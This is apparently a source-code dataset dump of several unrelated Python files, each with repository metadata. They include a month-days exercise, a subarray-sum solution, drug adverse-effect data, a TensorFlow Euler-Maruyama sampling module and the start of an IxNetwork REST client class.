    data['coordinates_in_tsne_space'] = tsne.fit_transform(np.asarray(data_representations))
    return data
# def load_data(experiment_directory):
#
# dh = ad.ExplorationDataHandler.create(directory=os.path.join(experiment_directory, 'results'))
# dh.load(load_observations=False, verbose=True)
#
# dh.config.save_automatic = False
# dh.config.load_observations = True
# dh.config.memory_size_observations = 1
#
# return dh
def load_explorer(experiment_directory):
    """Load a GoalSpaceExplorer from `<experiment_directory>/results` and
    re-attach its configuration from the experiment's config module.

    Observations are not loaded up-front; the data handler is configured to
    load them lazily, keeping at most one run's observations in memory.
    """
    # load the full explorer without observations and add its config
    explorer = ad.explorers.GoalSpaceExplorer.load_explorer(os.path.join(experiment_directory, 'results'), run_ids=[], load_observations=False, verbose=False)
    explorer.data.config.load_observations = True
    explorer.data.config.memory_size_observations = 1
    # Import experiment_config.py from the experiment directory by file path
    # and take the explorer configuration from it.
    spec = importlib.util.spec_from_file_location('experiment_config', os.path.join(experiment_directory, 'experiment_config.py'))
    experiment_config_module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(experiment_config_module)
    explorer.config = experiment_config_module.get_explorer_config()
    return explorer
if __name__ == '__main__':
    # Collect statistics for the experiment located in the current directory.
    experiments = '.'
    # Each entry: (statistic name, collector callable[, output format]).
    # The 'zip' marker presumably tells exputils to store the returned dict of
    # PNG bytes as a zip archive -- TODO confirm against exputils.
    statistics = [('final_observation', collect_final_observation, 'zip'),
                  ('observations', collect_observations, 'zip'),
                  ('representations', collect_representation),
                  ]
exputils.calc_experiment_statistics(statistics, load_explorer, experiments, recalculate_statistics=False, verbose=True) | [
"[email protected]"
] | |
667d3a55f26dcbea425733e4d22f03d40b58aea2 | 8f26514c451e2398d5e3688c184ea74d1dad21b2 | /month_01/test_01/test_02.py | 60b70e67643224bf76ad67e8d5c2bc33fc6e5eb3 | [] | no_license | CircularWorld/Python_exercise | 25e7aebe45b4d2ee4e3e3afded082c56483117de | 96d4d9c5c626f418803f44584c5350b7ce514368 | refs/heads/master | 2022-11-21T07:29:39.054971 | 2020-07-20T10:12:24 | 2020-07-20T10:12:24 | 281,081,559 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | '''
2.需求:在终端中获取月份和年份,打印相应的天数.
1 3 5 7 8 10 12 有 31天
2平年有28天,闰年有29天
4 6 9 11 有 30天
步骤:在终端中录入年份和月份,根据逻辑判断 ,显示天数
'''
def days_in_month(year, month):
    """Return the number of days in `month` of `year`, or None if `month`
    is outside 1..12."""
    if month not in range(1, 13):
        return None
    if month in (4, 6, 9, 11):
        return 30
    if month == 2:
        # Leap year: divisible by 4 but not by 100, or divisible by 400.
        return 29 if (year % 4 == 0 and year % 100 != 0 or year % 400 == 0) else 28
    return 31


if __name__ == "__main__":
    # Interactive part kept under a guard so the module can be imported/tested.
    month = int(input('请输入月份:'))
    year = int(input("请输入年份:"))
    days = days_in_month(year, month)
    if days is None:
        print("输入有误")
    elif month == 2:
        # February: report leap/common year explicitly, as before.
        if days == 29:
            print(f'{year}是闰年,二月有29天')
        else:
            print(f'{year}是平年,二月有28天')
    else:
        print(f"{year}年{month:02}月有{days}天")
| [
"[email protected]"
] | |
4f7885709411c1849cb738566eade86235d66115 | 906ca170744eb2e075b7236814f2137a0283966d | /highFreq/subarraySumClosest.py | 375a0b7543a6c12ebb1706033df97221ba3ac4fe | [] | no_license | logancyang/lintcode | 815f893ee970d760403b409f2adcb11627ce917e | c541fa91b2187391320a8a1dd3e2ca75041b3dab | refs/heads/master | 2021-05-30T14:03:28.795033 | 2015-10-26T19:50:45 | 2015-10-26T19:50:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,259 | py | # subarraySumClosest: http://www.lintcode.com/en/problem/subarray-sum-closest/
class Solution:

    def subarraySumClosestBrute(self, nums):
        """O(n^3) reference implementation.

        @param nums: a list of integers
        @return: [first, last] indices (inclusive) of a subarray whose sum
            is closest to zero
        """
        result = [0, 0]
        if nums is None or len(nums) <= 1:
            return result
        min_dist = float("inf")
        # Single-element subarrays [i, i].
        for i in range(len(nums)):
            if abs(nums[i]) < min_dist:
                min_dist = abs(nums[i])
                result = [i, i]
        # All longer subarrays; re-summing each slice makes this O(n^3).
        for i in range(len(nums)):
            for j in range(i + 1, len(nums)):
                distance = abs(sum(nums[i:j + 1]))
                if distance < min_dist:
                    min_dist = distance
                    result = [i, j]
        return result

    def subarraySumClosest(self, nums):
        """O(n log n) solution via sorted prefix sums.

        Fixes two defects: a (0, -1) sentinel prefix is added so subarrays
        starting at index 0 (including single elements) are considered, and
        the best candidate is tracked in one pass instead of a separate
        single-element scan whose result could be overwritten by a worse
        pairwise candidate.

        @param nums: a list of integers
        @return: [first, last] indices (inclusive) of the subarray whose sum
            is closest to zero
        """
        if nums is None or len(nums) <= 1:
            return [0, 0]
        # (prefix sum of nums[:k+1], k); the sentinel is the empty prefix.
        prefix_sums = [(0, -1)]
        running = 0
        for index in range(len(nums)):
            running += nums[index]
            prefix_sums.append((running, index))
        prefix_sums.sort()
        # After sorting, the two closest prefix sums are adjacent; the
        # subarray strictly between their indices has the sum closest to 0.
        best_diff = float("inf")
        result = [0, 0]
        for k in range(1, len(prefix_sums)):
            diff = prefix_sums[k][0] - prefix_sums[k - 1][0]
            if diff < best_diff:
                best_diff = diff
                lo = min(prefix_sums[k - 1][1], prefix_sums[k][1])
                hi = max(prefix_sums[k - 1][1], prefix_sums[k][1])
                # prefix[hi] - prefix[lo] is the sum of nums[lo + 1 .. hi].
                result = [lo + 1, hi]
        return result
# Ad-hoc smoke run.  NOTE: Python 2 print statement -- this file targets Python 2.
A = [-3, 1, 1, -3, 5]
Sol = Solution()
print Sol.subarraySumClosest(A)
"[email protected]"
] | |
c56498fc4dae80612f8baae4f506c36ed59b0171 | b39d9ef9175077ac6f03b66d97b073d85b6bc4d0 | /Benzylpenicillin_Panpharma_powder_for_solution_for_injection_or_infusion_SmPC.py | 69089c71ae727141e3d4f4acc96f228c2a5007ba | [] | no_license | urudaro/data-ue | 2d840fdce8ba7e759b5551cb3ee277d046464fe0 | 176c57533b66754ee05a96a7429c3e610188e4aa | refs/heads/master | 2021-01-22T12:02:16.931087 | 2013-07-16T14:05:41 | 2013-07-16T14:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | {'_data': [['Uncommon',
[['General',
u'(>1/1 000 till Blodet och lymfsystemet: eosinofili < 1/100): Hud och subkutan v\xe4vnad: urtikaria']]],
['Rare',
[['General',
u'< 1/1 000): anafylaktiska reaktioner. Blodet och lymfsystemet: agranulocytos, hemolytisk anemi, leukopeni. Magtarmkanalen: diarr\xe9 orsakad av Clostridium difficile.']]],
['Unknown', [['General', u'tromboflebit']]]],
'_pages': [2, 3],
u'_rank': 3,
u'_type': u'LSFU'} | [
"daro@daro-ThinkPad-X220.(none)"
] | daro@daro-ThinkPad-X220.(none) |
813ed9d22c40ad0ebf512f0f48797ec447f7b234 | 00cb5907750926f1a9b0fde97301f10d01f49645 | /tf_quant_finance/models/euler_sampling.py | 27d3ed52099fd2850f5f9dd8d627110fafddc958 | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla"
] | permissive | dannyb2018/tf-quant-finance | 63761e4a39b615da6a5258e48030d2b12a142b26 | 668b4fb0f91b1f60c9015cef087b3e879ee2a4f7 | refs/heads/master | 2023-07-07T20:00:59.529305 | 2021-08-18T13:05:11 | 2021-08-18T13:05:51 | 284,707,826 | 0 | 0 | Apache-2.0 | 2020-08-03T13:29:15 | 2020-08-03T13:29:14 | null | UTF-8 | Python | false | false | 22,684 | py | # Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Euler sampling method for ito processes."""
from typing import Callable, List, Optional
import tensorflow.compat.v2 as tf
from tf_quant_finance import types
from tf_quant_finance import utils as tff_utils
from tf_quant_finance.math import custom_loops
from tf_quant_finance.math import random
from tf_quant_finance.models import utils
def sample(
    dim: int,
    drift_fn: Callable[..., types.RealTensor],
    volatility_fn: Callable[..., types.RealTensor],
    times: types.RealTensor,
    time_step: Optional[types.RealTensor] = None,
    num_time_steps: Optional[types.IntTensor] = None,
    num_samples: types.IntTensor = 1,
    initial_state: Optional[types.RealTensor] = None,
    random_type: Optional[random.RandomType] = None,
    seed: Optional[types.IntTensor] = None,
    swap_memory: bool = True,
    skip: types.IntTensor = 0,
    precompute_normal_draws: bool = True,
    times_grid: Optional[types.RealTensor] = None,
    normal_draws: Optional[types.RealTensor] = None,
    watch_params: Optional[List[types.RealTensor]] = None,
    validate_args: bool = False,
    tolerance: Optional[types.RealTensor] = None,
    dtype: Optional[tf.DType] = None,
    name: Optional[str] = None) -> types.RealTensor:
  """Returns a sample paths from the process using Euler method.
  For an Ito process,
  ```
  dX = a(t, X_t) dt + b(t, X_t) dW_t
  X(t=0) = x0
  ```
  with given drift `a` and volatility `b` functions Euler method generates a
  sequence {X_n} as
  ```
  X_{n+1} = X_n + a(t_n, X_n) dt + b(t_n, X_n) (N(0, t_{n+1}) - N(0, t_n)),
  X_0 = x0
  ```
  where `dt = t_{n+1} - t_n` and `N` is a sample from the Normal distribution.
  See [1] for details.
  #### Example
  Sampling from 2-dimensional Ito process of the form:
  ```none
  dX_1 = mu_1 * sqrt(t) dt + s11 * dW_1 + s12 * dW_2
  dX_2 = mu_2 * sqrt(t) dt + s21 * dW_1 + s22 * dW_2
  ```
  ```python
  import tensorflow as tf
  import tf_quant_finance as tff
  import numpy as np
  mu = np.array([0.2, 0.7])
  s = np.array([[0.3, 0.1], [0.1, 0.3]])
  num_samples = 10000
  dim = 2
  dtype = tf.float64
  # Define drift and volatility functions
  def drift_fn(t, x):
    return mu * tf.sqrt(t) * tf.ones([num_samples, dim], dtype=dtype)
  def vol_fn(t, x):
    return s * tf.ones([num_samples, dim, dim], dtype=dtype)
  # Set starting location
  x0 = np.array([0.1, -1.1])
  # Sample `num_samples` paths at specified `times` using Euler scheme.
  times = [0.1, 1.0, 2.0]
  paths = tff.models.euler_sampling.sample(
      dim=dim,
      drift_fn=drift_fn,
      volatility_fn=vol_fn,
      times=times,
      num_samples=num_samples,
      initial_state=x0,
      time_step=0.01,
      seed=42,
      dtype=dtype)
  # Expected: paths.shape = [10000, 3, 2]
  ```
  #### References
  [1]: Wikipedia. Euler-Maruyama method:
  https://en.wikipedia.org/wiki/Euler-Maruyama_method
  Args:
    dim: Python int greater than or equal to 1. The dimension of the Ito
      Process.
    drift_fn: A Python callable to compute the drift of the process. The
      callable should accept two real `Tensor` arguments of the same dtype.
      The first argument is the scalar time t, the second argument is the
      value of Ito process X - tensor of shape
      `batch_shape + [num_samples, dim]`. `batch_shape` is the shape of the
      independent stochastic processes being modelled and is inferred from the
      initial state `x0`.
      The result is value of drift a(t, X). The return value of the callable
      is a real `Tensor` of the same dtype as the input arguments and of shape
      `batch_shape + [num_samples, dim]`.
    volatility_fn: A Python callable to compute the volatility of the process.
      The callable should accept two real `Tensor` arguments of the same dtype
      and shape `times_shape`. The first argument is the scalar time t, the
      second argument is the value of Ito process X - tensor of shape
      `batch_shape + [num_samples, dim]`. The result is value of drift b(t, X).
      The return value of the callable is a real `Tensor` of the same dtype as
      the input arguments and of shape `batch_shape + [num_samples, dim, dim]`.
    times: Rank 1 `Tensor` of increasing positive real values. The times at
      which the path points are to be evaluated.
    time_step: An optional scalar real `Tensor` - maximal distance between
      points in grid in Euler schema.
      Either this or `num_time_steps` should be supplied.
      Default value: `None`.
    num_time_steps: An optional Scalar integer `Tensor` - a total number of time
      steps performed by the algorithm. The maximal distance between points in
      grid is bounded by `times[-1] / (num_time_steps - times.shape[0])`.
      Either this or `time_step` should be supplied.
      Default value: `None`.
    num_samples: Positive scalar `int`. The number of paths to draw.
      Default value: 1.
    initial_state: `Tensor` of shape broadcastable with
      `batch_shape + [num_samples, dim]`. The initial state of the process.
      `batch_shape` represents the shape of the independent batches of the
      stochastic process. Note that `batch_shape` is inferred from
      the `initial_state` and hence when sampling is requested for a batch of
      stochastic processes, the shape of `initial_state` should be at least
      `batch_shape + [1, 1]`.
      Default value: None which maps to a zero initial state.
    random_type: Enum value of `RandomType`. The type of (quasi)-random
      number generator to use to generate the paths.
      Default value: None which maps to the standard pseudo-random numbers.
    seed: Seed for the random number generator. The seed is
      only relevant if `random_type` is one of
      `[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
        STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
      `HALTON_RANDOMIZED` the seed should be a Python integer. For
      `STATELESS` and `STATELESS_ANTITHETIC` it must be supplied as an integer
      `Tensor` of shape `[2]`.
      Default value: `None` which means no seed is set.
    swap_memory: A Python bool. Whether GPU-CPU memory swap is enabled for this
      op. See an equivalent flag in `tf.while_loop` documentation for more
      details. Useful when computing a gradient of the op since `tf.while_loop`
      is used to propagate stochastic process in time.
      Default value: True.
    skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
      Halton sequence to skip. Used only when `random_type` is 'SOBOL',
      'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
      Default value: `0`.
    precompute_normal_draws: Python bool. Indicates whether the noise increments
      `N(0, t_{n+1}) - N(0, t_n)` are precomputed. For `HALTON` and `SOBOL`
      random types the increments are always precomputed. While the resulting
      graph consumes more memory, the performance gains might be significant.
      Default value: `True`.
    times_grid: An optional rank 1 `Tensor` representing time discretization
      grid. If `times` are not on the grid, then the nearest points from the
      grid are used. When supplied, `num_time_steps` and `time_step` are
      ignored.
      Default value: `None`, which means that times grid is computed using
      `time_step` and `num_time_steps`.
    normal_draws: A `Tensor` of shape broadcastable with
      `batch_shape + [num_samples, num_time_points, dim]` and the same
      `dtype` as `times`. Represents random normal draws to compute increments
      `N(0, t_{n+1}) - N(0, t_n)`. When supplied, `num_samples` argument is
      ignored and the first dimensions of `normal_draws` is used instead.
      Default value: `None` which means that the draws are generated by the
      algorithm. By default normal_draws for each model in the batch are
      independent.
    watch_params: An optional list of zero-dimensional `Tensor`s of the same
      `dtype` as `initial_state`. If provided, specifies `Tensor`s with respect
      to which the differentiation of the sampling function will happen.
      A more efficient algorithm is used when `watch_params` are specified.
      Note that the function becomes differentiable only wrt to these `Tensor`s
      and the `initial_state`. The gradient wrt any other `Tensor` is set to be
      zero.
    validate_args: Python `bool`. When `True` performs multiple checks:
      * That `times` are increasing with the minimum increments of the
        specified tolerance.
      * If `normal_draws` are supplied, checks that `normal_draws.shape[1]` is
        equal to `num_time_steps` that is either supplied as an argument or
        computed from `time_step`.
      When `False` invalid dimension may silently render incorrect outputs.
      Default value: `False`.
    tolerance: A non-negative scalar `Tensor` specifying the minimum tolerance
      for discernible times on the time grid. Times that are closer than the
      tolerance are perceived to be the same.
      Default value: `None` which maps to `1e-6` for single precision
      `dtype` and `1e-10` for double precision `dtype`.
    dtype: `tf.Dtype`. If supplied the dtype for the input and output `Tensor`s.
      Default value: None which means that the dtype implied by `times` is
      used.
    name: Python string. The name to give this op.
      Default value: `None` which maps to `euler_sample`.
  Returns:
    A real `Tensor` of shape batch_shape_process + [num_samples, k, n] where `k`
    is the size of the `times`, `n` is the dimension of the process.
  Raises:
    ValueError:
      (a) When `times_grid` is not supplied, and neither `num_time_steps` nor
        `time_step` are supplied or if both are supplied.
      (b) If `normal_draws` is supplied and `dim` is mismatched.
    tf.errors.InvalidArgumentError: If `normal_draws` is supplied and
      `num_time_steps` is mismatched.
  """
  name = name or 'euler_sample'
  with tf.name_scope(name):
    times = tf.convert_to_tensor(times, dtype=dtype)
    if dtype is None:
      dtype = times.dtype
    asserts = []
    # Default tolerance depends on the floating point precision in use.
    if tolerance is None:
      tolerance = 1e-10 if dtype == tf.float64 else 1e-6
    tolerance = tf.convert_to_tensor(tolerance, dtype=dtype)
    if validate_args:
      asserts.append(
          tf.assert_greater(
              times[1:], times[:-1] + tolerance,
              message='`times` increments should be greater '
                      'than tolerance {0}'.format(tolerance)))
    if initial_state is None:
      initial_state = tf.zeros(dim, dtype=dtype)
    initial_state = tf.convert_to_tensor(initial_state, dtype=dtype,
                                         name='initial_state')
    # Everything but the trailing [num_samples, dim] dims of the initial state
    # is treated as the batch of independent processes.
    batch_shape = tff_utils.get_shape(initial_state)[:-2]
    num_requested_times = tff_utils.get_shape(times)[0]
    # Create a time grid for the Euler scheme.
    if num_time_steps is not None and time_step is not None:
      raise ValueError(
          'When `times_grid` is not supplied only one of either '
          '`num_time_steps` or `time_step` should be defined but not both.')
    if times_grid is None:
      if time_step is None:
        if num_time_steps is None:
          raise ValueError(
              'When `times_grid` is not supplied, either `num_time_steps` '
              'or `time_step` should be defined.')
        num_time_steps = tf.convert_to_tensor(
            num_time_steps, dtype=tf.int32, name='num_time_steps')
        time_step = times[-1] / tf.cast(num_time_steps, dtype=dtype)
      else:
        time_step = tf.convert_to_tensor(time_step, dtype=dtype,
                                         name='time_step')
    else:
      times_grid = tf.convert_to_tensor(times_grid, dtype=dtype,
                                        name='times_grid')
      if validate_args:
        asserts.append(
            tf.assert_greater(
                times_grid[1:], times_grid[:-1] + tolerance,
                message='`times_grid` increments should be greater '
                        'than tolerance {0}'.format(tolerance)))
    # Merge `times` into the simulation grid; `keep_mask` marks grid points
    # that correspond to the requested output `times`.
    times, keep_mask, time_indices = utils.prepare_grid(
        times=times,
        time_step=time_step,
        num_time_steps=num_time_steps,
        times_grid=times_grid,
        tolerance=tolerance,
        dtype=dtype)
    if normal_draws is not None:
      normal_draws = tf.convert_to_tensor(normal_draws, dtype=dtype,
                                          name='normal_draws')
      # Move the time axis in front so each loop step can index `normal_draws[i]`.
      # Shape [num_time_points] + batch_shape + [num_samples, dim]
      normal_draws_rank = normal_draws.shape.rank
      perm = tf.concat(
          [[normal_draws_rank-2], tf.range(normal_draws_rank-2),
           [normal_draws_rank-1]], axis=0)
      normal_draws = tf.transpose(normal_draws, perm=perm)
      num_samples = tf.shape(normal_draws)[-2]
      draws_dim = normal_draws.shape[-1]
      if dim != draws_dim:
        raise ValueError(
            '`dim` should be equal to `normal_draws.shape[2]` but are '
            '{0} and {1} respectively'.format(dim, draws_dim))
      if validate_args:
        draws_times = tff_utils.get_shape(normal_draws)[0]
        asserts.append(tf.assert_equal(
            draws_times, tf.shape(keep_mask)[0] - 1,
            message='`num_time_steps` should be equal to '
                    '`tf.shape(normal_draws)[1]`'))
    if validate_args:
      # Tie the validation asserts into the graph so they execute.
      with tf.control_dependencies(asserts):
        times = tf.identity(times)
    if watch_params is not None:
      watch_params = [tf.convert_to_tensor(param, dtype=dtype)
                      for param in watch_params]
    return _sample(
        dim=dim,
        batch_shape=batch_shape,
        drift_fn=drift_fn,
        volatility_fn=volatility_fn,
        times=times,
        keep_mask=keep_mask,
        num_requested_times=num_requested_times,
        num_samples=num_samples,
        initial_state=initial_state,
        random_type=random_type,
        seed=seed,
        swap_memory=swap_memory,
        skip=skip,
        precompute_normal_draws=precompute_normal_draws,
        normal_draws=normal_draws,
        watch_params=watch_params,
        time_indices=time_indices,
        dtype=dtype)
def _sample(*,
            dim,
            batch_shape,
            drift_fn,
            volatility_fn,
            times,
            keep_mask,
            num_requested_times,
            num_samples,
            initial_state,
            random_type,
            seed, swap_memory,
            skip,
            precompute_normal_draws,
            watch_params,
            time_indices,
            normal_draws,
            dtype):
  """Returns a sample of paths from the process using Euler method.

  Prepares the time increments and (optionally) precomputed normal draws,
  then dispatches either to `_while_loop` (default) or to `_for_loop`
  (when `watch_params` is supplied, which enables efficient differentiation
  with respect to those parameters).
  """
  # Grid increments and their square roots (scale factors for Wiener draws).
  dt = times[1:] - times[:-1]
  sqrt_dt = tf.sqrt(dt)
  # current_state.shape = batch_shape + [num_samples, dim]
  current_state = initial_state + tf.zeros([num_samples, dim], dtype=dtype)
  steps_num = tff_utils.get_shape(dt)[-1]
  wiener_mean = None
  if normal_draws is None:
    # In order to use low-discrepancy random_type we need to generate the
    # sequence of independent random normals upfront. We also precompute random
    # numbers for stateless random type in order to ensure independent samples
    # for multiple function calls with different seeds.
    if precompute_normal_draws or random_type in (
        random.RandomType.SOBOL,
        random.RandomType.HALTON,
        random.RandomType.HALTON_RANDOMIZED,
        random.RandomType.STATELESS,
        random.RandomType.STATELESS_ANTITHETIC):
      normal_draws = utils.generate_mc_normal_draws(
          num_normal_draws=dim, num_time_steps=steps_num,
          num_sample_paths=num_samples, batch_shape=batch_shape,
          random_type=random_type, dtype=dtype, seed=seed, skip=skip)
      wiener_mean = None
    else:
      # If pseudo or antithetic sampling is used, proceed with random sampling
      # at each step.
      wiener_mean = tf.zeros((dim,), dtype=dtype, name='wiener_mean')
      normal_draws = None
  if watch_params is None:
    # Use while_loop if `watch_params` is not passed
    return _while_loop(
        steps_num=steps_num,
        current_state=current_state,
        drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
        num_samples=num_samples, times=times,
        dt=dt, sqrt_dt=sqrt_dt, keep_mask=keep_mask,
        num_requested_times=num_requested_times,
        swap_memory=swap_memory,
        random_type=random_type, seed=seed, normal_draws=normal_draws,
        dtype=dtype)
  else:
    # Use custom for_loop if `watch_params` is specified
    return _for_loop(
        batch_shape=batch_shape, steps_num=steps_num,
        current_state=current_state,
        drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
        num_samples=num_samples, times=times,
        dt=dt, sqrt_dt=sqrt_dt, time_indices=time_indices,
        keep_mask=keep_mask, watch_params=watch_params,
        random_type=random_type, seed=seed, normal_draws=normal_draws)
def _while_loop(*, steps_num, current_state,
                drift_fn, volatility_fn, wiener_mean,
                num_samples, times, dt, sqrt_dt, num_requested_times,
                keep_mask, swap_memory, random_type, seed, normal_draws, dtype):
  """Sample paths using tf.while_loop.

  Iterates `_euler_step` over the time grid, writing the state into a
  `tf.TensorArray` at every grid point flagged by `keep_mask`.
  """
  written_count = 0
  if isinstance(num_requested_times, int) and num_requested_times == 1:
    # Single output time: no TensorArray needed, just carry the state.
    record_samples = False
    result = current_state
  else:
    # If more than one sample has to be recorded, create a TensorArray
    record_samples = True
    element_shape = current_state.shape
    result = tf.TensorArray(dtype=dtype,
                            size=num_requested_times,
                            element_shape=element_shape,
                            clear_after_read=False)
    # Include initial state, if necessary
    result = result.write(written_count, current_state)
    # keep_mask[0] indicates whether t=0 is one of the requested times.
    written_count += tf.cast(keep_mask[0], dtype=tf.int32)
  # Define sampling while_loop body function
  def cond_fn(i, written_count, *args):
    # It can happen that `times_grid[-1] > times[-1]` in which case we have
    # to terminate when `written_count` reaches `num_requested_times`
    del args
    return tf.math.logical_and(i < steps_num,
                               written_count < num_requested_times)
  def step_fn(i, written_count, current_state, result):
    return _euler_step(
        i=i,
        written_count=written_count,
        current_state=current_state,
        result=result,
        drift_fn=drift_fn,
        volatility_fn=volatility_fn,
        wiener_mean=wiener_mean,
        num_samples=num_samples,
        times=times,
        dt=dt,
        sqrt_dt=sqrt_dt,
        keep_mask=keep_mask,
        random_type=random_type,
        seed=seed,
        normal_draws=normal_draws,
        record_samples=record_samples)
  # Sample paths
  _, _, _, result = tf.while_loop(
      cond_fn, step_fn, (0, written_count, current_state, result),
      maximum_iterations=steps_num,
      swap_memory=swap_memory)
  if not record_samples:
    # shape batch_shape + [num_samples, 1, dim]
    return tf.expand_dims(result, axis=-2)
  # Shape [num_time_points] + batch_shape + [num_samples, dim]
  result = result.stack()
  # transpose to shape batch_shape + [num_samples, num_time_points, dim]
  n = result.shape.rank
  perm = list(range(1, n-1)) + [0, n - 1]
  return tf.transpose(result, perm)
def _for_loop(*, batch_shape, steps_num, current_state,
              drift_fn, volatility_fn, wiener_mean, watch_params,
              num_samples, times, dt, sqrt_dt, time_indices,
              keep_mask, random_type, seed, normal_draws):
  """Sample paths using custom for_loop.

  Used when `watch_params` is supplied: `custom_loops.for_loop` records
  states only at `time_indices` and supports efficient differentiation with
  respect to `watch_params`.
  """
  del batch_shape
  # Static number of requested output times. `time_indices` is rank 1, so
  # `as_list()[-1]` is its length as a Python int (or `None` if unknown).
  # Note: the previous `as_list()[:-1]` produced a *list*, which made both
  # `isinstance(num_time_points, int)` and the `== 1` checks below always
  # False, silently breaking the single-time-point path.
  num_time_points = time_indices.shape.as_list()[-1]
  if isinstance(num_time_points, int) and num_time_points == 1:
    # Only the final state is needed: iterate over all Euler steps.
    iter_nums = steps_num
  else:
    # Record a state at each requested time index.
    iter_nums = time_indices
  def step_fn(i, current_state):
    # Unpack current_state
    current_state = current_state[0]
    _, _, next_state, _ = _euler_step(
        i=i,
        written_count=0,
        current_state=current_state,
        result=current_state,
        drift_fn=drift_fn,
        volatility_fn=volatility_fn,
        wiener_mean=wiener_mean,
        num_samples=num_samples,
        times=times,
        dt=dt,
        sqrt_dt=sqrt_dt,
        keep_mask=keep_mask,
        random_type=random_type,
        seed=seed,
        normal_draws=normal_draws,
        record_samples=False)
    return [next_state]
  result = custom_loops.for_loop(
      body_fn=step_fn,
      initial_state=[current_state],
      params=watch_params,
      num_iterations=iter_nums)[0]
  if num_time_points == 1:
    # shape batch_shape + [num_samples, 1, dim]
    return tf.expand_dims(result, axis=-2)
  # result.shape=[num_time_points] + batch_shape + [num_samples, dim]
  # transpose to shape=batch_shape + [num_time_points, num_samples, dim]
  n = result.shape.rank
  perm = list(range(1, n-1)) + [0, n - 1]
  return tf.transpose(result, perm)
def _euler_step(*, i, written_count, current_state,
                drift_fn, volatility_fn, wiener_mean,
                num_samples, times, dt, sqrt_dt, keep_mask,
                random_type, seed, normal_draws, result,
                record_samples):
  """Advances the process by one Euler-Maruyama step.

  Computes X_{i+1} = X_i + a(t, X_i) dt + b(t, X_i) . dW and, when
  `record_samples` is True, writes the new state into the `result`
  TensorArray at position `written_count`.
  """
  t_next = times[i + 1]
  written_count = tf.cast(written_count, tf.int32)
  # Wiener increment: take a precomputed draw when available, otherwise
  # sample a fresh multivariate normal for this step.
  if normal_draws is None:
    noise = random.mv_normal_sample(
        (num_samples,), mean=wiener_mean, random_type=random_type,
        seed=seed)
  else:
    noise = normal_draws[i]
  noise = noise * sqrt_dt[i]
  drift_term = dt[i] * drift_fn(t_next, current_state)  # pylint: disable=not-callable
  diffusion_term = tf.linalg.matvec(
      volatility_fn(t_next, current_state), noise)  # pylint: disable=not-callable
  next_state = current_state + drift_term + diffusion_term
  if record_samples:
    result = result.write(written_count, next_state)
  else:
    result = next_state
  # Advance the write cursor only when this grid point is a requested time.
  written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)
  return i + 1, written_count, next_state, result
# Public API of this module: only the `sample` entry point is exported.
__all__ = ['sample']
| [
"[email protected]"
] | |
823d1a2718699ef51208e2f707d1e8d3994fa6a8 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ovsdbcontroller_789ff2911c009a5ce719da4041ccbf73.py | f77a1ef26f1ad4fed45de942f83349bbf533fa7d | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,934 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Ovsdbcontroller(Base):
"""
The Ovsdbcontroller class encapsulates a list of ovsdbcontroller resources that are managed by the user.
A list of resources can be retrieved from the server using the Ovsdbcontroller.find() method.
The list can be managed by using the Ovsdbcontroller.add() and Ovsdbcontroller.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'ovsdbcontroller'
_SDM_ATT_MAP = {
'ClearDumpDbFiles': 'clearDumpDbFiles',
'ConnectedVia': 'connectedVia',
'ConnectionType': 'connectionType',
'ControllerTcpPort': 'controllerTcpPort',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DirectoryName': 'directoryName',
'DumpdbDirectoryName': 'dumpdbDirectoryName',
'EnableLogging': 'enableLogging',
'EnableOvsdbServerIp': 'enableOvsdbServerIp',
'ErrorCode': 'errorCode',
'ErrorDesc': 'errorDesc',
